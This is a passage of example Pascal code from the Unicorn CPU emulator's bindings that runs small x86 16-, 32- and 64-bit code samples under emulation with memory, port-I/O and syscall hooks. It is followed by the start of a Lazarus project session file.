user_data: Pointer); cdecl; begin case _type of UC_MEM_READ: begin WriteLn(Format('>>> Memory is being READ at 0x%x, data size = %u', [address, size])); end; UC_MEM_WRITE: begin WriteLn(Format('>>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x', [address, size, value])); end; end; end; // callback for IN instruction (X86). // this returns the data read from the port function HookIn(uc: uc_engine; port: UInt32; size: integer; user_data: Pointer): Uint32; cdecl; var eip: UInt32; begin uc_reg_read(uc, UC_X86_REG_EIP, @eip); WriteLn(Format('--- reading from port 0x%x, size: %u, address: 0x%x', [port, size, eip])); case size of 1: begin // read 1 byte to AL Result := $f1; end; 2: begin // read 2 byte to AX Result := $f2; end; 4: begin // read 4 byte to EAX Result := $f4; end; else begin // should never reach this Result := 0; end; end; end; // callback for OUT instruction (X86). procedure HookOut(uc: uc_engine; port: UInt32; size: integer; value: UInt32; user_data: Pointer); cdecl; var tmp, eip: UInt32; begin uc_reg_read(uc, UC_X86_REG_EIP, @eip); WriteLn(Format('--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x', [port, size, value, eip])); // confirm that value is indeed the value of AL/AX/EAX case size of 1: begin uc_reg_read(uc, UC_X86_REG_AL, @tmp); end; 2: begin uc_reg_read(uc, UC_X86_REG_AX, @tmp); end; 4: begin uc_reg_read(uc, UC_X86_REG_EAX, @tmp); end; else begin // should never reach this Exit; end; end; WriteLn(Format('--- register value = 0x%x', [tmp])); end; // callback for SYSCALL instruction (X86). procedure HookSyscall(uc: uc_engine; user_data: Pointer); cdecl; var rax: UInt64; begin uc_reg_read(uc, UC_X86_REG_RAX, @rax); if (rax = $100) then begin rax := $200; uc_reg_write(uc, UC_X86_REG_RAX, @rax); end else WriteLn(Format('ERROR: was not expecting rax=0x%x in syscall', [rax])); end; procedure TestI386; var uc: uc_engine; err: uc_err; tmp: UInt32; trace1, trace2: uc_hook; r_ecx, r_edx: integer; r_xmm0,r_xmm1 : array [0..1] of UInt64; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register r_xmm0[0] := $08090a0b0c0d0e0f; r_xmm0[1] := $0001020304050607; r_xmm1[0] := {%H-}$8090a0b0c0d0e0f0; r_xmm1[1] := $0010203040506070; WriteLn('Emulate i386 code'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32, SizeOf(X86_CODE32) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); uc_reg_write(uc, UC_X86_REG_XMM0, @r_xmm0); uc_reg_write(uc, UC_X86_REG_XMM1, @r_xmm1); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); // emulate machine code in infinite time err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); uc_reg_read(uc, UC_X86_REG_XMM0, @r_xmm0); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); WriteLn(Format('>>> XMM0 = 0x%s%s', [IntToHex(r_xmm0[1],16),IntToHex(r_xmm0[0],16)])); // read from memory err := uc_mem_read_(uc, ADDRESS, @tmp, SizeOf(tmp)); if (err = UC_ERR_OK) then begin WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [ADDRESS, tmp])); end else begin WriteLn(Format('>>> Failed to read 4 bytes from [0x%x], err = %u: %s', [ADDRESS, err, uc_strerror(err)])); end; uc_close(uc); end; procedure test_i386_map_ptr(); var uc: uc_engine; err: uc_err; tmp: UInt32; trace1, trace2: uc_hook; mem : Pointer; r_ecx, r_edx: integer; r_xmm0,r_xmm1 : array [0..1] of UInt64; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register r_xmm0[0] := $08090a0b0c0d0e0f; r_xmm0[1] := $0001020304050607; r_xmm1[0] := {%H-}$8090a0b0c0d0e0f0; r_xmm1[1] := $0010203040506070; WriteLn('==================================='); WriteLn('Emulate i386 code - use uc_mem_map_ptr()'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; mem := AllocMem(2 * 1024 * 1024); if mem = nil then begin Writeln('Failed to Allocmem'); uc_close(uc); exit; end; err := uc_mem_map_ptr(uc,ADDRESS,2 * 1024 * 1024,UC_PROT_ALL,mem); if err <> UC_ERR_OK then begin WriteLn(Format('Failed on uc_mem_map_ptr() with error returned: %u - %s', [err,uc_strerror(err)])); FreeMem(mem,2 * 1024 * 1024); uc_close(uc); Exit; end; Move(X86_CODE32,mem^,SizeOf(X86_CODE32)-1); if CompareMem(mem,@X86_CODE32,SizeOf(X86_CODE32)-1) <> true then begin Writeln('Failed to write emulation code to memory, quit!'); Freemem(mem,2 * 1024 * 1024); uc_close(uc); exit; end; uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); uc_reg_write(uc, UC_X86_REG_XMM0, @r_xmm0); uc_reg_write(uc, UC_X86_REG_XMM1, @r_xmm1); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end . uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); // emulate machine code in infinite time err := uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); if err <> UC_ERR_OK then WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); Writeln('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); uc_reg_read(uc, UC_X86_REG_XMM0, @r_xmm0); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); WriteLn(Format('>>> XMM0 = 0x%s%s', [IntToHex(r_xmm0[1],16),IntToHex(r_xmm0[0],16)])); // read from memory err := uc_mem_read_(uc, ADDRESS, @tmp, SizeOf(tmp)); if (err = UC_ERR_OK) then begin WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [ADDRESS, tmp])); end else begin WriteLn(Format('>>> Failed to read 4 bytes from [0x%x], err = %u: %s', [ADDRESS, err, uc_strerror(err)])); end; Freemem(mem,2 * 1024 * 1024); uc_close(uc); end; procedure TestI386Jump; var uc: uc_engine; err: uc_err; trace1, trace2: uc_hook; begin WriteLn('==================================='); WriteLn('Emulate i386 code with jump'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_JUMP, SizeOf(X86_CODE32_JUMP) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // tracing 1 basic block with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, ADDRESS, ADDRESS,[]); // tracing 1 instruction at ADDRESS uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, ADDRESS, ADDRESS,[]); // emulate machine code in infinite time err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_JUMP) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; WriteLn('>>> Emulation done.'); uc_close(uc); end; procedure TestI386Loop; var uc: uc_engine; err: uc_err; r_ecx, r_edx: integer; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register WriteLn('==================================='); WriteLn('Emulate i386 code that loop forever'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_LOOP, SizeOf(X86_CODE32_LOOP) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); // emulate machine code in 2 seconds, so we can quit even // if the code loops err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_LOOP) - 1, 2 * UC_SECOND_SCALE, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); uc_close(uc); end; procedure TestI386InvalidMemRead; var uc: uc_engine; err: uc_err; trace1, trace2: uc_hook; r_ecx, r_edx: integer; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register WriteLn('==================================='); WriteLn('Emulate i386 code that read from invalid memory'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_MEM_READ, SizeOf(X86_CODE32_MEM_READ) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); uc_close(uc); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_MEM_READ) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); uc_close(uc); end; procedure TestI386InvalidMemWrite; var uc: uc_engine; err: uc_err; trace1, trace2, trace3: uc_hook; r_ecx, r_edx: integer; tmp: UInt32; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register WriteLn('==================================='); WriteLn('Emulate i386 code that write to invalid memory'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_MEM_WRITE, SizeOf(X86_CODE32_MEM_WRITE) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); // intercept invalid memory events uc_hook_add(uc, trace3, UC_HOOK_MEM_READ_UNMAPPED or UC_HOOK_MEM_WRITE_UNMAPPED, @HookMemInvalid, nil,1,0,[]); err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_MEM_WRITE) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); // read from memory err := uc_mem_read_(uc, $aaaaaaaa, @tmp, SizeOf(tmp)); if (err = UC_ERR_OK) then WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [$aaaaaaaa, tmp])) else WriteLn(Format('>>> Failed to read 4 bytes from [0x%x]', [$aaaaaaaa])); err := uc_mem_read_(uc, $ffffffaa, @tmp, SizeOf(tmp)); if (err = UC_ERR_OK) then WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [$ffffffaa, tmp])) else WriteLn(Format('>>> Failed to read 4 bytes from [0x%x]', [$ffffffaa])); uc_close(uc); end; procedure TestI386JumpInvalid; var uc: uc_engine; err: uc_err; trace1, trace2: uc_hook; r_ecx, r_edx: integer; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register WriteLn('==================================='); WriteLn('Emulate i386 code that jumps to invalid memory'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_JMP_INVALID, SizeOf(X86_CODE32_JMP_INVALID) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); uc_close(uc); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_JMP_INVALID) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); uc_close(uc); end; procedure TestI386Inout; var uc: uc_engine; err: uc_err; trace1, trace2, trace3, trace4: uc_hook; r_ecx, r_edx: integer; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register WriteLn('==================================='); WriteLn('Emulate i386 code with IN/OUT instructions'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_INOUT, SizeOf(X86_CODE32_INOUT) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); // uc IN instruction uc_hook_add(uc, trace3, UC_HOOK_INSN, @HookIn, nil, 1,0,[UC_X86_INS_IN]); // uc OUT instruction uc_hook_add(uc, trace4, UC_HOOK_INSN, @HookOut, nil, 1,0,[UC_X86_INS_OUT]); err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_INOUT) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); uc_close(uc); end; procedure test_i386_context_save(); var uc: uc_engine; context : uc_context; err: uc_err; r_eax : integer; begin r_eax := 1; // EAX register WriteLn('==================================='); WriteLn('Emulate i386 code - Save/restore CPU context in opaque blob'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; uc_mem_map(uc,ADDRESS,8 * 1024 , UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_INC, SizeOf(X86_CODE32_INC) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); uc_close(uc); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, @r_eax); // emulate machine code in infinite time writeln('>>> Running emulation for the first time'); err := uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; Writeln('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_EAX, @r_eax); WriteLn(Format('>>> EAX = 0x%x', [r_eax])); Writeln('>>> Saving CPU context'); err := uc_context_alloc(uc,context); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_context_alloc() with error returned %u : %s', [err, uc_strerror(err)])); exit; end; err := uc_context_save(uc, context); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_context_save() with error returned %u : %s', [err, uc_strerror(err)])); exit; end; Writeln('>>> Running emulation for the second time'); err := uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; Writeln('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_EAX, @r_eax); WriteLn(Format('>>> EAX = 0x%x', [r_eax])); err := uc_context_restore(uc, context); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_context_restore() with error returned %u: %s', [err, uc_strerror(err)])); exit; end; Writeln('>>> CPU context restored. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_EAX, @r_eax); WriteLn(Format('>>> EAX = 0x%x', [r_eax])); err := uc_free(context); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_free() with error returned %u: %s', [err, uc_strerror(err)])); exit; end; uc_close(uc); end; procedure TestX86_64; var uc: uc_engine; err: uc_err; trace1, trace2, trace3, trace4: uc_hook; rax, rbx, rcx, rdx, rsi, rdi, r8, r9, r10, r11, r12, r13, r14, r15, rsp: UInt64; begin rax := $71f3029efd49d41d; rbx := $d87b45277f133ddb; rcx := $ab40d1ffd8afc461; rdx := $919317b4a733f01; rsi := $4c24e753a17ea358; rdi := $e509a57d2571ce96; r8 := $ea5b108cc2b9ab1f; r9 := $19ec097c8eb618c1; r10 := $ec45774f00c5f682; r11 := $e17e9dbec8c074aa; r12 := $80f86a8dc0f6d457; r13 := $48288ca5671c5492; r14 := $595f72f6e4017f6e; r15 := $1efd97aea331cccc; rsp := ADDRESS + $200000; WriteLn('Emulate x86_64 code'); // Initialize emulator in X86-64bit mode err := uc_open(UC_ARCH_X86, UC_MODE_64, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE64, SizeOf(X86_CODE64) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_RSP, @rsp); uc_reg_write(uc, UC_X86_REG_RAX, @rax); uc_reg_write(uc, UC_X86_REG_RBX, @rbx); uc_reg_write(uc, UC_X86_REG_RCX, @rcx); uc_reg_write(uc, UC_X86_REG_RDX, @rdx); uc_reg_write(uc, UC_X86_REG_RSI, @rsi); uc_reg_write(uc, UC_X86_REG_RDI, @rdi); uc_reg_write(uc, UC_X86_REG_R8, @r8); uc_reg_write(uc, UC_X86_REG_R9, @r9); uc_reg_write(uc, UC_X86_REG_R10, @r10); uc_reg_write(uc, UC_X86_REG_R11, @r11); uc_reg_write(uc, UC_X86_REG_R12, @r12); uc_reg_write(uc, UC_X86_REG_R13, @r13); uc_reg_write(uc, UC_X86_REG_R14, @r14); uc_reg_write(uc, UC_X86_REG_R15, @r15); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode64, nil, ADDRESS, ADDRESS + 20,[]); // tracing all memory WRITE access (with @begin > @end) uc_hook_add(uc, trace3, UC_HOOK_MEM_WRITE, @HookMem64, nil, 1, 0,[]); // tracing all memory READ access (with @begin > @end) uc_hook_add(uc, trace4, UC_HOOK_MEM_READ, @HookMem64, nil, 1, 0,[]); err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE64) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_RAX, @rax); uc_reg_read(uc, UC_X86_REG_RBX, @rbx); uc_reg_read(uc, UC_X86_REG_RCX, @rcx); uc_reg_read(uc, UC_X86_REG_RDX, @rdx); uc_reg_read(uc, UC_X86_REG_RSI, @rsi); uc_reg_read(uc, UC_X86_REG_RDI, @rdi); uc_reg_read(uc, UC_X86_REG_R8, @r8); uc_reg_read(uc, UC_X86_REG_R9, @r9); uc_reg_read(uc, UC_X86_REG_R10, @r10); uc_reg_read(uc, UC_X86_REG_R11, @r11); uc_reg_read(uc, UC_X86_REG_R12, @r12); uc_reg_read(uc, UC_X86_REG_R13, @r13); uc_reg_read(uc, UC_X86_REG_R14, @r14); uc_reg_read(uc, UC_X86_REG_R15, @r15); WriteLn(Format('>>> RAX = 0x%.16x', [rax])); WriteLn(Format('>>> RBX = 0x%.16x', [rbx])); WriteLn(Format('>>> RCX = 0x%.16x', [rcx])); WriteLn(Format('>>> RDX = 0x%.16x', [rdx])); WriteLn(Format('>>> RSI = 0x%.16x', [rsi])); WriteLn(Format('>>> RDI = 0x%.16x', [rdi])); WriteLn(Format('>>> R8 = 0x%.16x', [r8])); WriteLn(Format('>>> R9 = 0x%.16x', [r9])); WriteLn(Format('>>> R10 = 0x%.16x', [r10])); WriteLn(Format('>>> R11 = 0x%.16x', [r11])); WriteLn(Format('>>> R12 = 0x%.16x', [r12])); WriteLn(Format('>>> R13 = 0x%.16x', [r13])); WriteLn(Format('>>> R14 = 0x%.16x', [r14])); WriteLn(Format('>>> R15 = 0x%.16x', [r15])); uc_close(uc); end; procedure TestX86_64Syscall; var uc: uc_engine; err: uc_err; trace1: uc_hook; rax: UInt64; begin rax := $100; WriteLn('==================================='); WriteLn('Emulate x86_64 code with "syscall" instruction'); // Initialize emulator in X86-64bit mode err := uc_open(UC_ARCH_X86, UC_MODE_64, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE64_SYSCALL, SizeOf(X86_CODE64_SYSCALL) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // hook interrupts for syscall uc_hook_add(uc, trace1, UC_HOOK_INSN, @HookSyscall, nil, 1 , 0 , [UC_X86_INS_SYSCALL]); // initialize machine registers uc_reg_write(uc, UC_X86_REG_RAX, @rax); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE64_SYSCALL) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_RAX, @rax); WriteLn(Format('>>> RAX = 0x%x', [rax])); uc_close(uc); end; procedure TestX86_16; var uc: uc_engine; err: uc_err; tmp: Word; eax, ebx, esi: UInt32; begin eax := 7; ebx := 5; esi := 6; WriteLn('Emulate x86 16-bit code'); // Initialize emulator in X86-16bit mode err := uc_open(UC_ARCH_X86, UC_MODE_16, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 8KB memory for this emulation uc_mem_map(uc, 0, 8 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, 0, @X86_CODE16, SizeOf(X86_CODE16) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, @eax); uc_reg_write(uc, UC_X86_REG_EBX, @ebx); uc_reg_write(uc, UC_X86_REG_ESI, @esi); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err := uc_emu_start(uc, 0, SizeOf(X86_CODE16) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); err := uc_mem_read_(uc, 11, @tmp, 1); if (err = UC_ERR_OK) then WriteLn(Format('>>> Read 1 bytes from [0x%x] = 0x%x', [11, tmp])) else WriteLn(Format('>>> Failed to read 1 bytes from [0x%x]', [11])); uc_close(uc); end; begin if ParamCount > 0 then begin if (ParamStr(1) = '-32') then begin TestI386; test_i386_map_ptr; test_i386_context_save; TestI386Inout; TestI386Jump; TestI386Loop; TestI386InvalidMemRead; TestI386InvalidMemWrite; TestI386JumpInvalid; end; if (ParamStr(1) = '-64') then begin TestX86_64; TestX86_64Syscall; end; if (ParamStr(1) = '-16') then begin TestX86_16; end; end else WriteLn(#10'Syntax: SampleX86 <-16|-32|-64>'#10); end. ��������������������unicorn-2.1.1/bindings/pascal/examples/x86.lps������������������������������������������������������0000664�0000000�0000000�00000014034�14675241067�0021231�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?xml version="1.0" encoding="UTF-8"?> <CONFIG> <ProjectSession> <Version Value="10"/> <BuildModes Active="Debug"/> <Units Count="10"> <Unit0> <Filename Value="x86.lpr"/> <IsPartOfProject Value="True"/> <TopLine Value="8"/> <CursorPos X="34" Y="4"/> <UsageCount Value="21"/> <Loaded Value="True"/> </Unit0> <Unit1> <Filename Value="../unicorn/UnicornConst.pas"/> <EditorIndex Value="-1"/> <CursorPos X="25" Y="2"/> <UsageCount Value="10"/> </Unit1> <Unit2> <Filename Value="../unicorn/Unicorn_dyn.pas"/> <IsVisibleTab Value="True"/> <EditorIndex Value="1"/> <CursorPos X="80" Y="3"/> <UsageCount Value="10"/> <Loaded Value="True"/> </Unit2> <Unit3> 